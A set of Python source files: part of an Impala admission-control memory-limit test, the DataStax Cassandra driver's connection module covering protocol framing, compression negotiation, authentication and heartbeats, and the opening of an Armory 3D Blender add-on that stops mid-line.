Raises an assertion if not all impalads have the same value.""" limit_metrics = [] for impalad in self.cluster.impalads: limit_metrics.append(impalad.service.get_metric_value("mem-tracker.process.limit")) assert limit_metrics[0] == limit_metrics[-1],\ "Not all impalads have the same process limit: %s" % (limit_metrics,) assert limit_metrics[0] is not None return limit_metrics[0] @pytest.mark.execute_serially @SkipIfOS.redhat6 @CustomClusterTestSuite.with_args( impalad_args=impalad_admission_ctrl_flags( max_requests=MAX_NUM_CONCURRENT_QUERIES * 30, max_queued=MAX_NUM_QUEUED_QUERIES, pool_max_mem=MEM_TEST_LIMIT, proc_mem_limit=MEM_TEST_LIMIT, queue_wait_timeout_ms=600000), statestored_args=_STATESTORED_ARGS) def test_mem_limit(self, vector): # Impala may set the proc mem limit lower than we think depending on the overcommit # settings of the OS. It should be fine to continue anyway. proc_limit = self.get_proc_limit() if proc_limit != MEM_TEST_LIMIT: LOG.info("Warning: Process mem limit %s is not expected val %s", proc_limit, MEM_TEST_LIMIT) self.pool_name = 'default-pool' # Each query mem limit (set the query option to override the per-host memory # estimate) should use a bit less than (total pool mem limit) / #queries so that # once #queries are running, the total pool mem usage is about at the limit and # additional incoming requests will be rejected. The actual pool limit on the number # of running requests is very high so that requests are only queued/rejected due to # the mem limit. num_impalads = len(self.cluster.impalads) query_mem_limit = (proc_limit / MAX_NUM_CONCURRENT_QUERIES / num_impalads) - 1 self.run_admission_test(vector, {'request_pool': self.pool_name, 'mem_limit': query_mem_limit})
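# --- Illustrative sketch (not part of the Impala test suite) -------------------------
# The per-query mem_limit arithmetic used in test_mem_limit above is easy to get wrong,
# so this standalone sketch repeats the same calculation with locally re-declared,
# hypothetical values. Only the formula mirrors the test; the numbers are made up.
def _example_per_query_mem_limit(proc_limit_bytes, max_concurrent_queries, num_impalads):
  # Each query should request slightly less than
  # (process/pool limit) / (#concurrent queries * #impalads), so that once the
  # configured number of queries is running the pool is effectively full and any
  # further requests are queued or rejected on memory alone.
  return (proc_limit_bytes // max_concurrent_queries // num_impalads) - 1

# Example: a hypothetical 12 GB process limit, 5 concurrent queries, 3-node minicluster.
# _example_per_query_mem_limit(12 * 1024 ** 3, 5, 3) -> 858993458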
connection.py
# Copyright DataStax, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import # to enable import io from stdlib from collections import defaultdict, deque import errno from functools import wraps, partial from heapq import heappush, heappop import io import logging import six from six.moves import range import socket import struct import sys from threading import Thread, Event, RLock import time try: import ssl except ImportError: ssl = None # NOQA if 'gevent.monkey' in sys.modules: from gevent.queue import Queue, Empty else: from six.moves.queue import Queue, Empty # noqa from cassandra import ConsistencyLevel, AuthenticationFailed, OperationTimedOut, ProtocolVersion from cassandra.marshal import int32_pack from cassandra.protocol import (ReadyMessage, AuthenticateMessage, OptionsMessage, StartupMessage, ErrorMessage, CredentialsMessage, QueryMessage, ResultMessage, ProtocolHandler, InvalidRequestException, SupportedMessage, AuthResponseMessage, AuthChallengeMessage, AuthSuccessMessage, ProtocolException, RegisterMessage) from cassandra.util import OrderedDict log = logging.getLogger(__name__) # We use an ordered dictionary and specifically add lz4 before # snappy so that lz4 will be preferred. Changing the order of this # will change the compression preferences for the driver. locally_supported_compressions = OrderedDict() try: import lz4 except ImportError: pass else: # The compress and decompress functions we need were moved from the lz4 to # the lz4.block namespace, so we try both here. try: from lz4 import block as lz4_block except ImportError: lz4_block = lz4 try: lz4_block.compress lz4_block.decompress except AttributeError: raise ImportError( 'lz4 not imported correctly. Imported object should have ' '.compress and and .decompress attributes but does not. ' 'Please file a bug report on JIRA. 
(Imported object was ' '{lz4_block})'.format(lz4_block=repr(lz4_block)) ) # Cassandra writes the uncompressed message length in big endian order, # but the lz4 lib requires little endian order, so we wrap these # functions to handle that def lz4_compress(byts): # write length in big-endian instead of little-endian return int32_pack(len(byts)) + lz4_block.compress(byts)[4:] def lz4_decompress(byts): # flip from big-endian to little-endian return lz4_block.decompress(byts[3::-1] + byts[4:]) locally_supported_compressions['lz4'] = (lz4_compress, lz4_decompress) try: import snappy except ImportError: pass else: # work around apparently buggy snappy decompress def decompress(byts): if byts == '\x00': return '' return snappy.decompress(byts) locally_supported_compressions['snappy'] = (snappy.compress, decompress) PROTOCOL_VERSION_MASK = 0x7f HEADER_DIRECTION_FROM_CLIENT = 0x00 HEADER_DIRECTION_TO_CLIENT = 0x80 HEADER_DIRECTION_MASK = 0x80 frame_header_v1_v2 = struct.Struct('>BbBi') frame_header_v3 = struct.Struct('>BhBi') class _Frame(object): def __init__(self, version, flags, stream, opcode, body_offset, end_pos): self.version = version self.flags = flags self.stream = stream self.opcode = opcode self.body_offset = body_offset self.end_pos = end_pos def __eq__(self, other): # facilitates testing if isinstance(other, _Frame): return (self.version == other.version and self.flags == other.flags and self.stream == other.stream and self.opcode == other.opcode and self.body_offset == other.body_offset and self.end_pos == other.end_pos) return NotImplemented def __str__(self): return "ver({0}); flags({1:04b}); stream({2}); op({3}); offset({4}); len({5})".format(self.version, self.flags, self.stream, self.opcode, self.body_offset, self.end_pos - self.body_offset) NONBLOCKING = (errno.EAGAIN, errno.EWOULDBLOCK) class ConnectionException(Exception): """ An unrecoverable error was hit when attempting to use a connection, or the connection was already closed or defunct. """ def __init__(self, message, host=None): Exception.__init__(self, message) self.host = host class ConnectionShutdown(ConnectionException): """ Raised when a connection has been marked as defunct or has been closed. """ pass class ProtocolVersionUnsupported(ConnectionException): """ Server rejected startup message due to unsupported protocol version """ def __init__(self, host, startup_version): msg = "Unsupported protocol version on %s: %d" % (host, startup_version) super(ProtocolVersionUnsupported, self).__init__(msg, host) self.startup_version = startup_version class ConnectionBusy(Exception): """ An attempt was made to send a message through a :class:`.Connection` that was already at the max number of in-flight operations. """ pass class ProtocolError(Exception): """ Communication did not match the protocol that this driver expects. """ pass def defunct_on_error(f): @wraps(f) def wrapper(self, *args, **kwargs): try: return f(self, *args, **kwargs) except Exception as exc: self.defunct(exc) return wrapper DEFAULT_CQL_VERSION = '3.0.0' if six.PY3: def int_from_buf_item(i): return i else: int_from_buf_item = ord class Connection(object): CALLBACK_ERR_THREAD_THRESHOLD = 100 in_buffer_size = 4096 out_buffer_size = 4096 cql_version = None no_compact = False protocol_version = ProtocolVersion.MAX_SUPPORTED keyspace = None compression = True compressor = None decompressor = None ssl_options = None last_error = None # The current number of operations that are in flight. More precisely, # the number of request IDs that are currently in use. 
in_flight = 0 # Max concurrent requests allowed per connection. This is set optimistically high, allowing # all request ids to be used in protocol version 3+. Normally concurrency would be controlled # at a higher level by the application or concurrent.execute_concurrent. This attribute # is for lower-level integrations that want some upper bound without reimplementing. max_in_flight = 2 ** 15 # A set of available request IDs. When using the v3 protocol or higher, # this will not initially include all request IDs in order to save memory, # but the set will grow if it is exhausted. request_ids = None # Tracks the highest used request ID in order to help with growing the # request_ids set highest_request_id = 0 is_defunct = False is_closed = False lock = None user_type_map = None msg_received = False is_unsupported_proto_version = False is_control_connection = False signaled_error = False # used for flagging at the pool level allow_beta_protocol_version = False _iobuf = None _current_frame = None _socket = None _socket_impl = socket _ssl_impl = ssl _check_hostname = False def __init__(self, host='127.0.0.1', port=9042, authenticator=None, ssl_options=None, sockopts=None, compression=True, cql_version=None, protocol_version=ProtocolVersion.MAX_SUPPORTED, is_control_connection=False, user_type_map=None, connect_timeout=None, allow_beta_protocol_version=False, no_compact=False): self.host = host self.port = port self.authenticator = authenticator self.ssl_options = ssl_options.copy() if ssl_options else None self.sockopts = sockopts self.compression = compression self.cql_version = cql_version self.protocol_version = protocol_version self.is_control_connection = is_control_connection self.user_type_map = user_type_map self.connect_timeout = connect_timeout self.allow_beta_protocol_version = allow_beta_protocol_version self.no_compact = no_compact self._push_watchers = defaultdict(set) self._requests = {} self._iobuf = io.BytesIO() if ssl_options: self._check_hostname = bool(self.ssl_options.pop('check_hostname', False)) if self._check_hostname: if not getattr(ssl, 'match_hostname', None): raise RuntimeError("ssl_options specify 'check_hostname', but ssl.match_hostname is not provided. " "Patch or upgrade Python to use this option.") if protocol_version >= 3: self.max_request_id = min(self.max_in_flight - 1, (2 ** 15) - 1) # Don't fill the deque with 2**15 items right away. Start with some and add # more if needed. initial_size = min(300, self.max_in_flight) self.request_ids = deque(range(initial_size)) self.highest_request_id = initial_size - 1 else: self.max_request_id = min(self.max_in_flight, (2 ** 7) - 1) self.request_ids = deque(range(self.max_request_id + 1)) self.highest_request_id = self.max_request_id self.lock = RLock() self.connected_event = Event() @classmethod def initialize_reactor(cls): """ Called once by Cluster.connect(). This should be used by implementations to set up any resources that will be shared across connections. """ pass @classmethod def handle_fork(cls): """ Called after a forking. This should cleanup any remaining reactor state from the parent process. """ pass @classmethod def create_timer(cls, timeout, callback): raise NotImplementedError() @classmethod def factory(cls, host, timeout, *args, **kwargs): """ A factory function which returns connections which have succeeded in connecting and are ready for service (or raises an exception otherwise). 
""" start = time.time() kwargs['connect_timeout'] = timeout conn = cls(host, *args, **kwargs) elapsed = time.time() - start conn.connected_event.wait(timeout - elapsed) if conn.last_error: if conn.is_unsupported_proto_version: raise ProtocolVersionUnsupported(host, conn.protocol_version) raise conn.last_error elif not conn.connected_event.is_set(): conn.close() raise OperationTimedOut("Timed out creating connection (%s seconds)" % timeout) else: return conn def _connect_socket(self): sockerr = None addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM) if not addresses: raise ConnectionException("getaddrinfo returned empty list for %s" % (self.host,)) for (af, socktype, proto, canonname, sockaddr) in addresses: try: self._socket = self._socket_impl.socket(af, socktype, proto) if self.ssl_options: if not self._ssl_impl: raise RuntimeError("This version of Python was not compiled with SSL support") self._socket = self._ssl_impl.wrap_socket(self._socket, **self.ssl_options) self._socket.settimeout(self.connect_timeout) self._socket.connect(sockaddr) self._socket.settimeout(None) if self._check_hostname: ssl.match_hostname(self._socket.getpeercert(), self.host) sockerr = None break except socket.error as err: if self._socket: self._socket.close() self._socket = None sockerr = err if sockerr: raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror or sockerr)) if self.sockopts: for args in self.sockopts: self._socket.setsockopt(*args) def close(self): raise NotImplementedError() def defunct(self, exc): with self.lock: if self.is_defunct or self.is_closed: return self.is_defunct = True exc_info = sys.exc_info() # if we are not handling an exception, just use the passed exception, and don't try to format exc_info with the message if any(exc_info): log.debug("Defuncting connection (%s) to %s:", id(self), self.host, exc_info=exc_info) else: log.debug("Defuncting connection (%s) to %s: %s", id(self), self.host, exc) self.last_error = exc self.close() self.error_all_requests(exc) self.connected_event.set() return exc def error_all_requests(self, exc): with self.lock: requests = self._requests self._requests = {} if not requests: return new_exc = ConnectionShutdown(str(exc)) def try_callback(cb): try: cb(new_exc) except Exception: log.warning("Ignoring unhandled exception while erroring requests for a " "failed connection (%s) to host %s:", id(self), self.host, exc_info=True) # run first callback from this thread to ensure pool state before leaving cb, _, _ = requests.popitem()[1] try_callback(cb) if not requests: return # additional requests are optionally errored from a separate thread # The default callback and retry logic is fairly expensive -- we don't # want to tie up the event thread when there are many requests def err_all_callbacks(): for cb, _, _ in requests.values(): try_callback(cb) if len(requests) < Connection.CALLBACK_ERR_THREAD_THRESHOLD: err_all_callbacks() else: # daemon thread here because we want to stay decoupled from the cluster TPE # TODO: would it make sense to just have a driver-global TPE? t = Thread(target=err_all_callbacks) t.daemon = True t.start() def get_request_id(self): """ This must be called while self.lock is held. 
""" try: return self.request_ids.popleft() except IndexError: new_request_id = self.highest_request_id + 1 # in_flight checks should guarantee this assert new_request_id <= self.max_request_id self.highest_request_id = new_request_id return self.highest_request_id def handle_pushed(self, response): log.debug("Message pushed from server: %r", response) for cb in self._push_watchers.get(response.event_type, []): try: cb(response.event_args) except Exception: log.exception("Pushed event handler errored, ignoring:") def send_msg(self, msg, request_id, cb, encoder=ProtocolHandler.encode_message, decoder=ProtocolHandler.decode_message, result_metadata=None): if self.is_defunct: raise ConnectionShutdown("Connection to %s is defunct" % self.host) elif self.is_closed: raise ConnectionShutdown("Connection to %s is closed" % self.host) # queue the decoder function with the request # this allows us to inject custom functions per request to encode, decode messages self._requests[request_id] = (cb, decoder, result_metadata) msg = encoder(msg, request_id, self.protocol_version, compressor=self.compressor, allow_beta_protocol_version=self.allow_beta_protocol_version) self.push(msg) return len(msg) def wait_for_response(self, msg, timeout=None): return self.wait_for_responses(msg, timeout=timeout)[0] def wait_for_responses(self, *msgs, **kwargs): """ Returns a list of (success, response) tuples. If success is False, response will be an Exception. Otherwise, response will be the normal query response. If fail_on_error was left as True and one of the requests failed, the corresponding Exception will be raised. """ if self.is_closed or self.is_defunct: raise ConnectionShutdown("Connection %s is already closed" % (self, )) timeout = kwargs.get('timeout') fail_on_error = kwargs.get('fail_on_error', True) waiter = ResponseWaiter(self, len(msgs), fail_on_error) # busy wait for sufficient space on the connection messages_sent = 0 while True: needed = len(msgs) - messages_sent with self.lock: available = min(needed, self.max_request_id - self.in_flight + 1) request_ids = [self.get_request_id() for _ in range(available)] self.in_flight += available for i, request_id in enumerate(request_ids): self.send_msg(msgs[messages_sent + i], request_id, partial(waiter.got_response, index=messages_sent + i)) messages_sent += available if messages_sent == len(msgs): break else: if timeout is not None: timeout -= 0.01 if timeout <= 0.0: raise OperationTimedOut() time.sleep(0.01) try: return waiter.deliver(timeout) except OperationTimedOut: raise except Exception as exc: self.defunct(exc) raise def register_watcher(self, event_type, callback, register_timeout=None): """ Register a callback for a given event type. """ self._push_watchers[event_type].add(callback) self.wait_for_response( RegisterMessage(event_list=[event_type]), timeout=register_timeout) def register_watchers(self, type_callback_dict, register_timeout=None): """ Register multiple callback/event type pairs, expressed as a dict. 
""" for event_type, callback in type_callback_dict.items(): self._push_watchers[event_type].add(callback) self.wait_for_response( RegisterMessage(event_list=type_callback_dict.keys()), timeout=register_timeout) def control_conn_disposed(self): self.is_control_connection = False self._push_watchers = {} @defunct_on_error def _read_frame_header(self): buf = self._iobuf.getvalue() pos = len(buf) if pos: version = int_from_buf_item(buf[0]) & PROTOCOL_VERSION_MASK if version > ProtocolVersion.MAX_SUPPORTED: raise ProtocolError("This version of the driver does not support protocol version %d" % version) frame_header = frame_header_v3 if version >= 3 else frame_header_v1_v2 # this frame header struct is everything after the version byte header_size = frame_header.size + 1 if pos >= header_size: flags, stream, op, body_len = frame_header.unpack_from(buf, 1) if body_len < 0: raise ProtocolError("Received negative body length: %r" % body_len) self._current_frame = _Frame(version, flags, stream, op, header_size, body_len + header_size) return pos def _reset_frame(self): self._iobuf = io.BytesIO(self._iobuf.read()) self._iobuf.seek(0, 2) # io.SEEK_END == 2 (constant not present in 2.6) self._current_frame = None def process_io_buffer(self): while True: if not self._current_frame: pos = self._read_frame_header() else: pos = self._iobuf.tell() if not self._current_frame or pos < self._current_frame.end_pos: # we don't have a complete header yet or we # already saw a header, but we don't have a # complete message yet return else: frame = self._current_frame self._iobuf.seek(frame.body_offset) msg = self._iobuf.read(frame.end_pos - frame.body_offset) self.process_msg(frame, msg) self._reset_frame() @defunct_on_error def process_msg(self, header, body): self.msg_received = True stream_id = header.stream if stream_id < 0: callback = None decoder = ProtocolHandler.decode_message result_metadata = None else: try: callback, decoder, result_metadata = self._requests.pop(stream_id) # This can only happen if the stream_id was # removed due to an OperationTimedOut except KeyError: return with self.lock: self.request_ids.append(stream_id) try: response = decoder(header.version, self.user_type_map, stream_id, header.flags, header.opcode, body, self.decompressor, result_metadata) except Exception as exc: log.exception("Error decoding response from Cassandra. 
" "%s; buffer: %r", header, self._iobuf.getvalue()) if callback is not None: callback(exc) self.defunct(exc) return try: if stream_id >= 0: if isinstance(response, ProtocolException): if 'unsupported protocol version' in response.message: self.is_unsupported_proto_version = True else: log.error("Closing connection %s due to protocol error: %s", self, response.summary_msg()) self.defunct(response) if callback is not None: callback(response) else: self.handle_pushed(response) except Exception: log.exception("Callback handler errored, ignoring:") @defunct_on_error def _send_options_message(self): if self.cql_version is None and (not self.compression or not locally_supported_compressions): log.debug("Not sending options message for new connection(%s) to %s " "because compression is disabled and a cql version was not " "specified", id(self), self.host) self._compressor = None self.cql_version = DEFAULT_CQL_VERSION self._send_startup_message(no_compact=self.no_compact) else: log.debug("Sending initial options message for new connection (%s) to %s", id(self), self.host) self.send_msg(OptionsMessage(), self.get_request_id(), self._handle_options_response) @defunct_on_error def _handle_options_response(self, options_response): if self.is_defunct: return if not isinstance(options_response, SupportedMessage): if isinstance(options_response, ConnectionException): raise options_response else: log.error("Did not get expected SupportedMessage response; " "instead, got: %s", options_response) raise ConnectionException("Did not get expected SupportedMessage " "response; instead, got: %s" % (options_response,)) log.debug("Received options response on new connection (%s) from %s", id(self), self.host) supported_cql_versions = options_response.cql_versions remote_supported_compressions = options_response.options['COMPRESSION'] if self.cql_version: if self.cql_version not in supported_cql_versions: raise ProtocolError( "cql_version %r is not supported by remote (w/ native " "protocol). Supported versions: %r" % (self.cql_version, supported_cql_versions)) else: self.cql_version = supported_cql_versions[0] self._compressor = None compression_type = None if self.compression: overlap = (set(locally_supported_compressions.keys()) & set(remote_supported_compressions)) if len(overlap) == 0: log.debug("No available compression types supported on both ends." " locally supported: %r. 
remotely supported: %r", locally_supported_compressions.keys(), remote_supported_compressions) else: compression_type = None if isinstance(self.compression, six.string_types): # the user picked a specific compression type ('snappy' or 'lz4') if self.compression not in remote_supported_compressions: raise ProtocolError( "The requested compression type (%s) is not supported by the Cassandra server at %s" % (self.compression, self.host)) compression_type = self.compression else: # our locally supported compressions are ordered to prefer # lz4, if available for k in locally_supported_compressions.keys(): if k in overlap: compression_type = k break # set the decompressor here, but set the compressor only after # a successful Ready message self._compressor, self.decompressor = \ locally_supported_compressions[compression_type] self._send_startup_message(compression_type, no_compact=self.no_compact) @defunct_on_error def _send_startup_message(self, compression=None, no_compact=False): log.debug("Sending StartupMessage on %s", self) opts = {} if compression: opts['COMPRESSION'] = compression if no_compact: opts['NO_COMPACT'] = 'true' sm = StartupMessage(cqlversion=self.cql_version, options=opts) self.send_msg(sm, self.get_request_id(), cb=self._handle_startup_response) log.debug("Sent StartupMessage on %s", self) @defunct_on_error def _handle_startup_response(self, startup_response, did_authenticate=False): if self.is_defunct: return if isinstance(startup_response, ReadyMessage): if self.authenticator: log.warning("An authentication challenge was not sent, " "this is suspicious because the driver expects " "authentication (configured authenticator = %s)", self.authenticator.__class__.__name__) log.debug("Got ReadyMessage on new connection (%s) from %s", id(self), self.host) if self._compressor: self.compressor = self._compressor self.connected_event.set() elif isinstance(startup_response, AuthenticateMessage): log.debug("Got AuthenticateMessage on new connection (%s) from %s: %s", id(self), self.host, startup_response.authenticator) if self.authenticator is None: raise AuthenticationFailed('Remote end requires authentication.') if isinstance(self.authenticator, dict): log.debug("Sending credentials-based auth response on %s", self) cm = CredentialsMessage(creds=self.authenticator) callback = partial(self._handle_startup_response, did_authenticate=True) self.send_msg(cm, self.get_request_id(), cb=callback) else: log.debug("Sending SASL-based auth response on %s", self) self.authenticator.server_authenticator_class = startup_response.authenticator initial_response = self.authenticator.initial_response() initial_response = "" if initial_response is None else initial_response self.send_msg(AuthResponseMessage(initial_response), self.get_request_id(), self._handle_auth_response) elif isinstance(startup_response, ErrorMessage): log.debug("Received ErrorMessage on new connection (%s) from %s: %s", id(self), self.host, startup_response.summary_msg()) if did_authenticate: raise AuthenticationFailed( "Failed to authenticate to %s: %s" % (self.host, startup_response.summary_msg())) else: raise ConnectionException( "Failed to initialize new connection to %s: %s" % (self.host, startup_response.summary_msg())) elif isinstance(startup_response, ConnectionShutdown): log.debug("Connection to %s was closed during the startup handshake", (self.host)) raise startup_response else: msg = "Unexpected response during Connection setup: %r" log.error(msg, startup_response) raise ProtocolError(msg % (startup_response,)) 
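    # Startup handshake overview for the callbacks around this point:
    #   OptionsMessage  -> SupportedMessage    (negotiate CQL version / compression)
    #   StartupMessage  -> ReadyMessage        (no authentication required), or
    #                   -> AuthenticateMessage (server requires authentication)
    #   AuthResponseMessage -> AuthChallengeMessage (repeat) or AuthSuccessMessage
    # _handle_startup_response above deals with the Ready/Authenticate branch, and
    # _handle_auth_response below loops on challenges until authentication succeeds.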
@defunct_on_error def _handle_auth_response(self, auth_response): if self.is_defunct: return if isinstance(auth_response, AuthSuccessMessage): log.debug("Connection %s successfully authenticated", self) self.authenticator.on_authentication_success(auth_response.token) if self._compressor: self.compressor = self._compressor self.connected_event.set() elif isinstance(auth_response, AuthChallengeMessage): response = self.authenticator.evaluate_challenge(auth_response.challenge) msg = AuthResponseMessage("" if response is None else response) log.debug("Responding to auth challenge on %s", self) self.send_msg(msg, self.get_request_id(), self._handle_auth_response) elif isinstance(auth_response, ErrorMessage): log.debug("Received ErrorMessage on new connection (%s) from %s: %s", id(self), self.host, auth_response.summary_msg()) raise AuthenticationFailed( "Failed to authenticate to %s: %s" % (self.host, auth_response.summary_msg())) elif isinstance(auth_response, ConnectionShutdown): log.debug("Connection to %s was closed during the authentication process", self.host) raise auth_response else: msg = "Unexpected response during Connection authentication to %s: %r" log.error(msg, self.host, auth_response) raise ProtocolError(msg % (self.host, auth_response)) def set_keyspace_blocking(self, keyspace): if not keyspace or keyspace == self.keyspace: return query = QueryMessage(query='USE "%s"' % (keyspace,), consistency_level=ConsistencyLevel.ONE) try: result = self.wait_for_response(query) except InvalidRequestException as ire: # the keyspace probably doesn't exist raise ire.to_exception() except Exception as exc: conn_exc = ConnectionException( "Problem while setting keyspace: %r" % (exc,), self.host) self.defunct(conn_exc) raise conn_exc if isinstance(result, ResultMessage): self.keyspace = keyspace else: conn_exc = ConnectionException( "Problem while setting keyspace: %r" % (result,), self.host) self.defunct(conn_exc) raise conn_exc def set_keyspace_async(self, keyspace, callback): """ Use this in order to avoid deadlocking the event loop thread. When the operation completes, `callback` will be called with two arguments: this connection and an Exception if an error occurred, otherwise :const:`None`. This method will always increment :attr:`.in_flight` attribute, even if it doesn't need to make a request, just to maintain an ":attr:`.in_flight` is incremented" invariant. """ # Here we increment in_flight unconditionally, whether we need to issue # a request or not. This is bad, but allows callers -- specifically # _set_keyspace_for_all_conns -- to assume that we increment # self.in_flight during this call. This allows the passed callback to # safely call HostConnection{Pool,}.return_connection on this # Connection. 
# # We use a busy wait on the lock here because: # - we'll only spin if the connection is at max capacity, which is very # unlikely for a set_keyspace call # - it allows us to avoid signaling a condition every time a request completes while True: with self.lock: if self.in_flight < self.max_request_id: self.in_flight += 1 break time.sleep(0.001) if not keyspace or keyspace == self.keyspace: callback(self, None) return query = QueryMessage(query='USE "%s"' % (keyspace,), consistency_level=ConsistencyLevel.ONE) def process_result(result): if isinstance(result, ResultMessage): self.keyspace = keyspace callback(self, None) elif isinstance(result, InvalidRequestException): callback(self, result.to_exception()) else: callback(self, self.defunct(ConnectionException( "Problem while setting keyspace: %r" % (result,), self.host))) # We've incremented self.in_flight above, so we "have permission" to # acquire a new request id request_id = self.get_request_id() self.send_msg(query, request_id, process_result) @property def is_idle(self): return not self.msg_received def reset_idle(self): self.msg_received = False def __str__(self): status = "" if self.is_defunct: status = " (defunct)" elif self.is_closed: status = " (closed)" return "<%s(%r) %s:%d%s>" % (self.__class__.__name__, id(self), self.host, self.port, status) __repr__ = __str__ class ResponseWaiter(object): def __init__(self, connection, num_responses, fail_on_error): self.connection = connection self.pending = num_responses self.fail_on_error = fail_on_error self.error = None self.responses = [None] * num_responses self.event = Event() def got_response(self, response, index): with self.connection.lock: self.connection.in_flight -= 1 if isinstance(response, Exception): if hasattr(response, 'to_exception'): response = response.to_exception() if self.fail_on_error: self.error = response self.event.set() else: self.responses[index] = (False, response) else: if not self.fail_on_error: self.responses[index] = (True, response) else: self.responses[index] = response self.pending -= 1 if not self.pending: self.event.set() def deliver(self, timeout=None): """ If fail_on_error was set to False, a list of (success, response) tuples will be returned. If success is False, response will be an Exception. Otherwise, response will be the normal query response. If fail_on_error was left as True and one of the requests failed, the corresponding Exception will be raised. Otherwise, the normal response will be returned. 
""" self.event.wait(timeout) if self.error: raise self.error elif not self.event.is_set(): raise OperationTimedOut() else: return self.responses class HeartbeatFuture(object): def __init__(self, connection, owner): self._exception = None self._event = Event() self.connection = connection self.owner = owner log.debug("Sending options message heartbeat on idle connection (%s) %s", id(connection), connection.host) with connection.lock: if connection.in_flight <= connection.max_request_id: connection.in_flight += 1 connection.send_msg(OptionsMessage(), connection.get_request_id(), self._options_callback) else: self._exception = Exception("Failed to send heartbeat because connection 'in_flight' exceeds threshold") self._event.set() def wait(self, timeout): self._event.wait(timeout) if self._event.is_set(): if self._exception: raise self._exception else: raise OperationTimedOut("Connection heartbeat timeout after %s seconds" % (timeout,), self.connection.host) def _options_callback(self, response): if isinstance(response, SupportedMessage): log.debug("Received options response on connection (%s) from %s", id(self.connection), self.connection.host) else: if isinstance(response, ConnectionException): self._exception = response else: self._exception = ConnectionException("Received unexpected response to OptionsMessage: %s" % (response,)) self._event.set() class ConnectionHeartbeat(Thread): def __init__(self, interval_sec, get_connection_holders, timeout): Thread.__init__(self, name="Connection heartbeat") self._interval = interval_sec self._timeout = timeout self._get_connection_holders = get_connection_holders self._shutdown_event = Event() self.daemon = True self.start() class ShutdownException(Exception): pass def run(self): self._shutdown_event.wait(self._interval) while not self._shutdown_event.is_set(): start_time = time.time() futures = [] failed_connections = [] try: for connections, owner in [(o.get_connections(), o) for o in self._get_connection_holders()]: for connection in connections: self._raise_if_stopped() if not (connection.is_defunct or connection.is_closed): if connection.is_idle: try: futures.append(HeartbeatFuture(connection, owner)) except Exception as e: log.warning("Failed sending heartbeat message on connection (%s) to %s", id(connection), connection.host) failed_connections.append((connection, owner, e)) else: connection.reset_idle() else: log.debug("Cannot send heartbeat message on connection (%s) to %s", id(connection), connection.host) # make sure the owner sees this defunt/closed connection owner.return_connection(connection) self._raise_if_stopped() # Wait max `self._timeout` seconds for all HeartbeatFutures to complete timeout = self._timeout start_time = time.time() for f in futures: self._raise_if_stopped() connection = f.connection try: f.wait(timeout) # TODO: move this, along with connection locks in pool, down into Connection with connection.lock: connection.in_flight -= 1 connection.reset_idle() except Exception as e: log.warning("Heartbeat failed for connection (%s) to %s", id(connection), connection.host) failed_connections.append((f.connection, f.owner, e)) timeout = self._timeout - (time.time() - start_time) for connection, owner, exc in failed_connections: self._raise_if_stopped() if not connection.is_control_connection: # Only HostConnection supports shutdown_on_error owner.shutdown_on_error = True connection.defunct(exc) owner.return_connection(connection) except self.ShutdownException: pass except Exception: log.error("Failed connection heartbeat", 
exc_info=True) elapsed = time.time() - start_time self._shutdown_event.wait(max(self._interval - elapsed, 0.01)) def stop(self): self._shutdown_event.set() self.join() def _raise_if_stopped(self): if self._shutdown_event.is_set(): raise self.ShutdownException() class Timer(object): canceled = False def __init__(self, timeout, callback): self.end = time.time() + timeout self.callback = callback def __lt__(self, other): return self.end < other.end def cancel(self): self.canceled = True def finish(self, time_now): if self.canceled: return True if time_now >= self.end: self.callback() return True return False class TimerManager(object): def __init__(self): self._queue = [] self._new_timers = [] def add_timer(self, timer): """ called from client thread with a Timer object """ self._new_timers.append((timer.end, timer)) def service_timeouts(self): """ run callbacks on all expired timers Called from the event thread :return: next end time, or None """ queue = self._queue if self._new_timers: new_timers = self._new_timers while new_timers: heappush(queue, new_timers.pop()) if queue: now = time.time() while queue: try: timer = queue[0][1] if timer.finish(now): heappop(queue) else: return timer.end except Exception: log.exception("Exception while servicing timeout callback: ") @property def next_timeout(self): try: return self._queue[0][0] except IndexError: pass
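# --- Illustrative sketch (not part of the driver) -------------------------------------
# Shows how the 9-byte v3+ native-protocol frame header maps onto frame_header_v3
# ('>BhBi'), which covers everything after the leading version byte. The field values
# below are made up purely for demonstration.
def _example_frame_header_roundtrip():
    version, flags, stream, opcode, body_len = 4, 0, 1, 5, 0
    # version byte first (direction bit cleared for a client frame), then flags,
    # a signed 16-bit stream id, the opcode, and a 32-bit body length
    header = six.int2byte(version) + frame_header_v3.pack(flags, stream, opcode, body_len)
    assert len(header) == frame_header_v3.size + 1  # 9 bytes in total
    parsed_version = int_from_buf_item(header[0]) & PROTOCOL_VERSION_MASK
    parsed_rest = frame_header_v3.unpack_from(header, 1)
    return parsed_version, parsed_rest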
armory.py
# Armory 3D Engine # https://github.com/armory3d/armory bl_info = { "name": "Armory", "category": "Render", "location": "Properties -> Render -> Armory Player", "description": "3D Game Engine for Blender", "author": "Armory3D.org", "version": (0, 6, 0), "blender": (2, 80, 0), "wiki_url": "http://armory3d.org/manual", "tracker_url": "https://github.com/armory3d/armory/issues" } import os import sys import stat import shutil import webbrowser import subprocess import threading import bpy import platform from bpy.types import Operator, AddonPreferences from bpy.props import * from bpy.app.handlers import persistent def get_os(): s = platform.system() if s == 'Windows': return 'win' elif s == 'Darwin': return 'mac' else: return 'linux' class ArmoryAddonPreferences(AddonPreferences): bl_idname = __name__ def sdk_path_update(self, context): if self.skip_update: return self.skip_update = True self.sdk_path = bpy.path.reduce_dirs([bpy.path.abspath(self.sdk_path)])[0] + '/' def ffmpeg_path_update(self, context): if self.skip_update: return self.skip_update = True self.ffmpeg_path = bpy.path.reduce_dirs([bpy.path.abspath(self.ffmpeg_path)])[0] def renderdoc_path_update(self, context): if self.skip_update: return self.skip_update = True self.renderdoc_path = bpy.path.reduce_dirs([bpy.path.abspath(self.renderdoc_path)])[0] sdk_bundled: BoolProperty(name="Bundled SDK", default=True) sdk_path: StringProperty(name="SDK Path", subtype="FILE_PATH", update=sdk_path_update, default="") show_advanced: BoolProperty(name="Show Advanced", 